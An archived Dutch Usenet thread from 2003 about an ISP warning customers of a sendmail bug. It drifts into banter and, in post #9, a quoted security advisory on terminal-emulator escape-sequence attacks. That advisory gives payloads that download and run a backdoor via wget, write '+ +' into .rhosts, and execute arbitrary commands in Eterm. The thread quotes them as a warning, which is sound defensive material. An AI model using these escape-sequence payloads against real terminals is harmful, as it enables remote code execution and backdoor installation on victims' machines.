Likes Likes:  0
Resultaten 1 tot 15 van de 16
Pagina 1 van de 2 1 2 LaatsteLaatste
Geen
  1. #1
    Fred Mobach
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    bit.nl en zorg voor beveiliging

    Heden is bekend geworden, dat er in de sendmail MTA een bug zit (zie
    CERT en BugTraq). Laat nou BIT vanavond al een berichtje naar me sturen,
    dat ik volgens hen misschien een niet zo veilige versie draai op een van
    mijn systemen. Dat valt weliswaar reuze mee (hij was net een uur
    daarvoor up-to-date gebracht), maar ik kan zo'n actie van een ISP wel
    waarderen.

    't Is, dat ik geen aandelen van BIT heb, anders zou iemand me wellicht
    nog van spammen willen beschuldigen ook. :-)
    --
    Fred Mobach - fred@mobach.nl - postmaster@mobach.nl
    Systemhouse Mobach bv - The Netherlands - since 1976
    website : http://fred.mobach.nl
    Safe Harbour for encumbered Free and Open Source software and links:
    http://apache.dataloss.nl/~fred/

  2. #2
    Alain
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    Fred Mobach schreef:

    > 't Is, dat ik geen aandelen van BIT heb, anders zou
    > iemand me wellicht nog van spammen willen beschuldigen
    > ook. :-)


    Hooguit voor 't hielen likken bij Sabri... :P

    --
    Alain

    spamsux.nl



  3. #3
    Jan Reilink
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    Fred Mobach wrote:
    > Heden is bekend geworden, dat er in de sendmail MTA een bug zit (zie
    > CERT en BugTraq). Laat nou BIT vanavond al een berichtje naar me sturen,
    > dat ik volgens hen misschien een niet zo veilige versie draai op een van
    > mijn systemen. Dat valt weliswaar reuze mee (hij was net een uur
    > daarvoor up-to-date gebracht), maar ik kan zo'n actie van een ISP wel
    > waarderen.
    >
    > 't Is, dat ik geen aandelen van BIT heb, anders zou iemand me wellicht
    > nog van spammen willen beschuldigen ook. :-)


    Ik moet toegeven dat het een nette actie van BIT is, maar ik kan me ook
    voorstellen dat BIT geen lekke sendmail machines in hun netwerk willen
    hebben (het is dus ook een beetje eigen belang .

    --
    Met vriendelijke groet / Best regards,
    Jan Reilink


  4. #4
    Mendel Mobach
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    De wet op behoud van ellende noopte
    Alain <Alain@shockmedia.nl.spamsux.nl>
    in nl.internet.providers tot het schrijven van:
    > Fred Mobach schreef:
    >
    >> 't Is, dat ik geen aandelen van BIT heb, anders zou
    >> iemand me wellicht nog van spammen willen beschuldigen
    >> ook. :-)

    >
    > Hooguit voor 't hielen likken bij Sabri... :P


    nee joh, die durft geen email naar sendmail dozen te
    sturen, dat weet je toch wel?
    --
    If you see an attachment here please blacklist me
    begin foutlook.exe
    Tsja, wil je het niet lezen gebruik dan www.geocities.com/trollenfilter/
    Eervolle vermelding voor mij: '* drop X-Trace:*172.16.21.68*'

  5. #5
    Ruben van der Leij
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    begin quotations from: Mendel Mobach <usenet@megabot.nl>:

    >> Hooguit voor 't hielen likken bij Sabri... :P

    >nee joh, die durft geen email naar sendmail dozen te
    >sturen, dat weet je toch wel?


    [sabri@crow ~]$ gcc -o sploit sploit.c ; ./sploit
    sploit: root gained

    [root@crow ~]#

    --
    Ruben van der Leij

    today, n.:
    A nice place to visit, but you can't stay here for long.


  6. #6
    Sabri Berisha
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    On Tue, 4 Mar 2003 15:58:51 +0000 (UTC), Ruben van der Leij <ruben-news@nutz.nl> wrote:
    > begin quotations from: Mendel Mobach <usenet@megabot.nl>:
    >
    >>> Hooguit voor 't hielen likken bij Sabri... :P

    >>nee joh, die durft geen email naar sendmail dozen te
    >>sturen, dat weet je toch wel?

    >
    > [sabri@crow ~]$ gcc -o sploit sploit.c ; ./sploit
    > sploit: root gained
    > [root@crow ~]#


    Welnee.

    [sabri@bofh sabri]$ ssh root@crow
    Enter passphrase for RSA key '/home/sabri/.ssh/identity':
    Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
    The Regents of the University of California. All rights
    reserved.

    FreeBSD 4.7-RELEASE-p2 (MAIL1) #3: Thu Jan 2 15:46:44 CET 2003

    bash-2.05#


    --
    Sabri Berisha "I route, therefore you are"

    Per user RBL checking: http://www.cluecentral.net/rblcheck/

  7. #7
    Riemer Palstra
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    In article <slrnb6bdf8.14pc.sabri@doos.cluecentral.net>, Sabri Berisha wrote:
    > [sabri@bofh sabri]$ ssh root@crow
    > Enter passphrase for RSA key '/home/sabri/.ssh/identity':


    /me geeft Sabri een ssh-agent

    rsp., lui
    --
    Riemer Palstra
    riemer@palstra.com

  8. #8
    Sabri Berisha
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    On Wed, 05 Mar 2003 09:09:13 -0000, Riemer Palstra <riemer@palstra.com> wrote:
    > In article <slrnb6bdf8.14pc.sabri@doos.cluecentral.net>, Sabri Berisha wrote:
    >> [sabri@bofh sabri]$ ssh root@crow
    >> Enter passphrase for RSA key '/home/sabri/.ssh/identity':

    >
    > /me geeft Sabri een ssh-agent


    [sabri@bofh sabri]$ head -n 1 sdoall/sdoall.sh
    #!/usr/local/bin/ssh-agent /bin/sh
    [sabri@bofh sabri]$

    ssh-agent's zijn handig, maar niet wanneer mijn de schoonmaker in de
    buurt van mijn doos komt terwijl ik thuis zit

    --
    Sabri Berisha "I route, therefore you are"

    Per user RBL checking: http://www.cluecentral.net/rblcheck/

  9. #9
    Ruben van der Leij
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    begin quotations from: Sabri Berisha <sabri@doos.cluecentral.net>:

    >ssh-agent's zijn handig, maar niet wanneer mijn de schoonmaker in de
    >buurt van mijn doos komt terwijl ik thuis zit


    Er zijn meer redenen om uit te loggen als je niet achter je PC zit. Console
    locken is niet voldoende.

    http://www.digitaldefense.net/labs/p...ermulation.txt

    [ Summary ]

    Many of the features supported by popular terminal emulator software can be
    abused when un-trusted data is displayed on the screen. The impact of this
    abuse can range from annoying screen garbage to a complete system
    compromise. All of the issues below are actually documented features, anyone
    who takes the time to read over the man pages or source code could use them
    to carry out an attack.

    [..]

    [ Remote Exploitation ]

    To exploit an escape sequence feature, an attacker must be able to display
    arbitrary data to the victim's terminal emulator. While at first glance that
    may seem rather unlikely, the attacker can take advantage of a number of
    small bugs in other applications to increase their chance of success.

    [..]

    Eterm and rxvt both implement what they call the "screen dump" feature.

    [..]

    $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"

    [..]

    The following example for xterm demonstrates a sequence that downloads and
    executes a backdoor while hiding the command line. The "Press Enter >"
    string should be changed to something appropriate for the attack vector.
    Some likely candidates include "wget internal error: press enter to
    continue" or "Error: unknown TERM, hit enter to continue".

    $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

    Any terminal emulator that allows the window title to be placed
    on the command-line is vulnerable to this attack. The applications which
    were confirmed vulnerable include xterm, dtterm, uxterm, rxvt, aterm, Eterm,
    hanterm, and putty[1]. The tested applications that did not allow the title
    to be written include gnome-terminal 2.0, konsole, SecureCRT,and aterm.

    [..]


    Eterm should be given an award for the "Easiest to Compromise" terminal
    emulator. The developers based much of their code off of the rxvt and xterm
    source, so Eterm tends to share the same problems as those two emulators as
    well. If you happen to be running a CVS version of Eterm from between
    February 10th and May 8th of 2001, it was possible to execute an arbitrary
    command just by displaying the following escape sequence:

    $ echo -e "\e]6;73;command\a"

    Fortunately, this feature never made it into an official
    release, the "fork-and-exec" ability was replaced by the script action
    spawn() instead.


    Enzovoort. Dat je het even weet. tail -f logfile open laten staan is *evil*.

    --

    Ruben van der Leij

    today, n.:
    A nice place to visit, but you can't stay here for long.


  10. #10
    Jurjen Oskam
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    In article <slrnb6budk.2lc.ruben-news@its.blacklisted.nl>, Ruben van der Leij wrote:

    > Enzovoort. Dat je het even weet. tail -f logfile open laten staan is *evil*.


    Zijn die IBM 3151 terminals toch nog ergens goed voor.. :-)

    --
    Jurjen Oskam

    PGP Key available at http://www.stupendous.org/

  11. #11
    Arjan
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    On Wed, 5 Mar 2003 at 08:30 -0000, Sabri Berisha wrote:

    > FreeBSD 4.7-RELEASE-p2 (MAIL1) #3: Thu Jan 2 15:46:44 CET 2003


    Je loopt achter met je patches

    --
    "I remember IANA" - ftp://ftp.isi.edu/in-notes/rfc2468.txt
    Potential spammers, read my spam-policy : inventionz.org/spam

  12. #12
    Arjan
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    On Wed, 5 Mar 2003 at 09:09 -0000, Riemer Palstra wrote:

    > rsp., lui


    *kut en peest naar jes, cc karina/chris*

    --
    "I remember IANA" - ftp://ftp.isi.edu/in-notes/rfc2468.txt
    Potential spammers, read my spam-policy : inventionz.org/spam

  13. #13
    Riemer Palstra
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    In article <20030307100140.R271@shell.inventionz.net>, Arjan wrote:
    > *kut en peest naar jes, cc karina/chris*


    Karina?

    --
    Riemer Palstra
    riemer@palstra.com

  14. #14
    Arjan
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    On Fri, 7 Mar 2003 at 09:18 -0000, Riemer Palstra wrote:

    > > *kut en peest naar jes, cc karina/chris*

    >
    > Karina?


    s/karina/hr

    en check het smoelenboek.
    --
    "I remember IANA" - ftp://ftp.isi.edu/in-notes/rfc2468.txt
    Potential spammers, read my spam-policy : inventionz.org/spam

  15. #15
    Riemer Palstra
    bit.nl en zorg voor beveiliging
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: bit.nl en zorg voor beveiliging

    In article <20030307102959.Y271@shell.inventionz.net>, Arjan wrote:
    > s/karina/hr


    Ah, dat klinkt al een stuk logischer.

    > en check het smoelenboek.


    Arjan... Arjan... *zoek zoek* Hmm, heb jij wel eens voor een webcam op
    het Singel een pose gedaan?

    --
    Riemer Palstra
    riemer@palstra.com

Pagina 1 van de 2 1 2 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics